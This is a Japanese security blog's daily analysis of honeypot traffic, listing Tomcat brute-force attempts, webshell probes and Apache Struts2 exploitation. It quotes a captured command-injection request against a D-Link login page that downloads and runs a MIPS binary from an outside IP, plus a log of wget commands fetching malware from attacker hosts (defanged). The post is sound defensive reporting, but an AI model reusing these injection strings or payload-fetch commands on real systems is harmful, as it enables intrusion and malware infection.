S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(54日目)

WOWHoneypotの簡易分析(54日目)

honeypot

WOWhoneypotの2018/07/27(金) (運用54日目)の簡易分析です。
本日の総アクセス件数は 492件です。一時期アクセス数が低減しどうしようかと思っていましたが、様子見しているうちにアクセス数が回復してきました。
以下が全アクセスログです。

335 2018-07-27 GET /manager/html
34 2018-07-27 GET /
17 2018-07-27 GET /index.action
5 2018-07-27 POST /qq.php
3 2018-07-27 POST /xx.php
3 2018-07-27 POST /q.php
3 2018-07-27 POST /qaq.php
3 2018-07-27 HEAD /
2 2018-07-27 PROPFIND /
2 2018-07-27 POST /zuoshou.php
2 2018-07-27 POST /yao.php
2 2018-07-27 POST /xw.php
2 2018-07-27 POST /xw1.php
2 2018-07-27 POST /xshell.php
2 2018-07-27 POST /xiao.php
2 2018-07-27 POST /xiaoma.php
2 2018-07-27 POST /wuwu11.php
2 2018-07-27 POST /wshell.php
2 2018-07-27 POST /w.php
2 2018-07-27 POST /weixiao.php
2 2018-07-27 POST /webslee.php
2 2018-07-27 POST /wc.php
2 2018-07-27 POST /system.php
2 2018-07-27 POST /s.php
2 2018-07-27 POST /sheep.php
2 2018-07-27 POST /phpstudy.php
2 2018-07-27 POST /pe.php
2 2018-07-27 POST /mx.php
2 2018-07-27 POST /log.php
2 2018-07-27 POST /lindex.php
2 2018-07-27 POST /hm.php
2 2018-07-27 POST /feixiang.php
2 2018-07-27 POST /fack.php
2 2018-07-27 POST /defect.php
2 2018-07-27 POST /db_session.init.php
2 2018-07-27 POST /db.init.php
2 2018-07-27 POST /db__.init.php
2 2018-07-27 POST /data.php
2 2018-07-27 POST /conflg.php
2 2018-07-27 POST /cmd.php
2 2018-07-27 POST /cainiao.php
2 2018-07-27 POST /aotu.php
2 2018-07-27 POST /angge.php
2 2018-07-27 POST /ak47.php
2 2018-07-27 POST /9678.php
2 2018-07-27 GET /webdav/
1 2018-07-27 POST /yumo.php
1 2018-07-27 POST /wanan.php
1 2018-07-27 POST /ssaa.php
1 2018-07-27 POST /mz.php
1 2018-07-27 POST /min.php
1 2018-07-27 POST /l8.php
1 2018-07-27 POST /l7.php
1 2018-07-27 POST /hh.php
1 2018-07-27 POST /aw.php
1 2018-07-27 POST /56.php
1 2018-07-27 POST /12.php
1 2018-07-27 GET /login.cgi?cli=aa%20aa%27;cd%20/tmp;wget%20hxxp://178.128.11.199/qtx.mips;chmod%20777%20qtx.mips;./qtx.mips%20dlink%20%27$
1 2018-07-27 GET hxxp://112.124.116.170:83/index.php

phpMyAdmin関連(0件)とphpに対するPOST(97件)と/アクセスを除外したアクセス数です。

335 2018-07-27 GET /manager/html
17 2018-07-27 GET /index.action
2 2018-07-27 GET /webdav/
1 2018-07-27 GET /login.cgi?cli=aa%20aa%27;cd%20/tmp;wget%20hxxp://178.128.11[.]199/qtx.mips;chmod%20777%20qtx.mips;./qtx.mips%20dlink%20%27$
1 2018-07-27 GET hxxp://112.124.116[.]170:83/index.php 

「GET /manager/html」
本日はTomcatの管理画面に対するブルートフォース攻撃がありました。 同一IPから全て別のパスワードで試行していました。

「GET /index.action」
Apache Struts2の任意のコード実行の脆弱性に対する攻撃です。2つのIPから攻撃が来ていました。攻撃の内容も異なるので2つのアクターから、と思われます。片方ではwgetコマンドを別のコマンドにリネームすることで後続の攻撃で他の攻撃者にやられないような”ケア”をしていました。

IoT機器に対する攻撃は急にまた落ち着いたようです。

 

本日のハンティングログは以下です。上4つはStruts脆弱性に対する攻撃で検知したものです。

1 2018-07-27 wget hxxp://222.186.153[.]142:26591/nodebase
1 2018-07-27 wget -c hxxp://103.55.13[.]68:81/nux 
1 2018-07-27 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 2018-07-27 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 2018-07-27 wget hxxp://178.128.11[.]199/qtx.mips 

以上です。